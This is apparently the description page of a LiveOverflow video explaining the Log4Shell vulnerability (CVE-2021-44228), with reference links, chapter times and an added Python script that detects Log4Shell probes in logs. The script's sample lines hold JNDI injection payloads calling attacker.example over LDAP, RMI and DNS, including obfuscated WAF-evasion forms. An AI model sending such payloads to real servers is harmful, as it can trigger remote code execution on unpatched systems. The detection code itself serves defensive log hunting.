Log4j Vulnerability (Log4Shell) Explained // CVE-2021-44228

Channel: LiveOverflow
Subscribers: 920,000
Video Link: https://www.youtube.com/watch?v=w2F67LbEtnk
Category: Vlog
Duration: 17:44
262,922 views
12,488

Let's try to make sense of the Log4j vulnerability called Log4Shell. First we look at Log4j's lookup feature and JNDI, and then we explore the history of the Log4Shell vulnerability. This is part 1 of a two-part series on Log4j.

Log4j Issues:
2013: https://issues.apache.org/jira/browse/LOG4J2-313
2014: https://issues.apache.org/jira/browse/LOG4J2-905
2017: https://issues.apache.org/jira/browse/LOG4J2-2109

Log4j 2 Security: https://logging.apache.org/log4j/2.x/security.html

German Government Warning: https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&v=3

Cloudflare: https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/

A JOURNEY FROM JNDI/LDAP MANIPULATION TO REMOTE CODE EXECUTION DREAM LAND: https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
whitepaper: https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
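
The lookup mechanism the video summarises is also what makes Log4Shell hard to spot in logs: Log4j resolves `${...}` expressions recursively, and the Cloudflare post linked above documents how attackers nested `lower`, `upper` and `:-` default-value lookups to hide the `jndi:` prefix from WAFs. The following is an added example (not code from the video or from the Log4j project) that normalises those nested lookups the way Log4j's Interpolator would and then flags lines that resolve to a `${jndi:` lookup. The sample log lines and the `attacker.example` hosts are constructed; only the `lower`, `upper` and default-value lookups are resolved, which is enough for the evasion shapes described in that post.

```python
import re

# Constructed sample lines (not from the video). The first is benign; the
# others carry a Log4Shell probe in a User-Agent, plain and obfuscated.
SAMPLE_LINES = [
    'GET / HTTP/1.1 ua="Mozilla/5.0"',
    'GET / HTTP/1.1 ua="${jndi:ldap://attacker.example/a}"',
    'GET / HTTP/1.1 ua="${${lower:j}${upper:n}di:${lower:l}dap://attacker.example/a}"',
    'GET / HTTP/1.1 ua="${${env:NOPE:-j}ndi:rmi://attacker.example/b}"',
    'GET / HTTP/1.1 ua="${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
]

# A ${...} whose body contains no further ${ or }: the innermost lookup.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Log4j lowercases the lookup prefix, so match jndi case-insensitively.
JNDI_MARKER = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_lookup(body: str) -> str:
    """Resolve one innermost ${...} body for the lookups that matter here.

    Returns the literal ${...} unchanged for a jndi lookup (the thing we want
    to surface) and for an unknown lookup that has no :-default.
    """
    prefix, _, rest = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return "${" + body + "}"
    # ${prefix:key:-default} is Log4j's default-value syntax.
    if ":-" in rest:
        arg, _, default = rest.partition(":-")
    else:
        arg, default = rest, None
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    # env/sys/date/... are not resolved in this example; an attacker picks a
    # key that is unset so Log4j falls back to the default, e.g. ${env:NOPE:-j}
    # or the empty-prefix form ${::-j}.
    if default is not None:
        return default
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(lambda m: resolve_lookup(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI_MARKER.search(normalize(line)) is not None


def scan(lines):
    """Return (index, normalized line) for every line that resolves to a jndi lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for idx, resolved in scan(SAMPLE_LINES):
        print(f"line {idx}: {resolved}")
```

Matching the raw bytes against `${jndi:` catches only the first sample; normalising first catches all four. This is after-the-fact detection for hunting in existing logs, not a mitigation: the fix is the upgrade described on the Log4j 2 security page linked above.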

---

00:00 - Intro
01:05 - BugBounty Public Service Announcement
02:23 - Chapter #1: Log4j 2
03:38 - Log4j Lookups
04:15 - Chapter #2: JNDI
06:01 - JNDI vs. Log4j
06:35 - Chapter #3: Log4Shell Timeline
07:33 - Developer Experiences Unexpected Lookups
09:51 - The Discovery of Log4Shell in 2021
11:08 - Chapter #4: The 2016 JNDI Security Research
11:56 - Java Serialized Object Features
13:27 - Why Was The Security Research Ignored?
14:44 - Chapter #5: Security Research vs. Software Engineering
16:49 - Final Words and Outlook to Part 2
17:23 - Outro

-=[ ❤️ Support ]=-

→ per Video: https://www.patreon.com/join/liveoverflow
→ per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join

-=[ 🐕 Social ]=-

→ Twitter: https://twitter.com/LiveOverflow/
→ Instagram: https://instagram.com/LiveOverflow/
→ Blog: https://liveoverflow.com/
→ Subreddit: https://www.reddit.com/r/LiveOverflow/
→ Facebook: https://www.facebook.com/LiveOverflow/

Tags: ${java:ldap://liveoverflow.com}, CVE, Live Overflow, blog, cve-2021-44228, enterprise java, exploit, exploit tutorial, exploit walkthrough, hacking tutorial, how to hack, in-depth, java, java deserialization, java logging, javaee, jndi, jvm, ldaps, ldap, ldap server, liveoverflow, log4j, log4j rce, log4j2, log4shell, log4shell demo, logger, maven, minecraft, objectstream, object serialization, remote class loading, rmi, serialisation, update, upgrade, vulnerability, walkthrough, writeup, zero day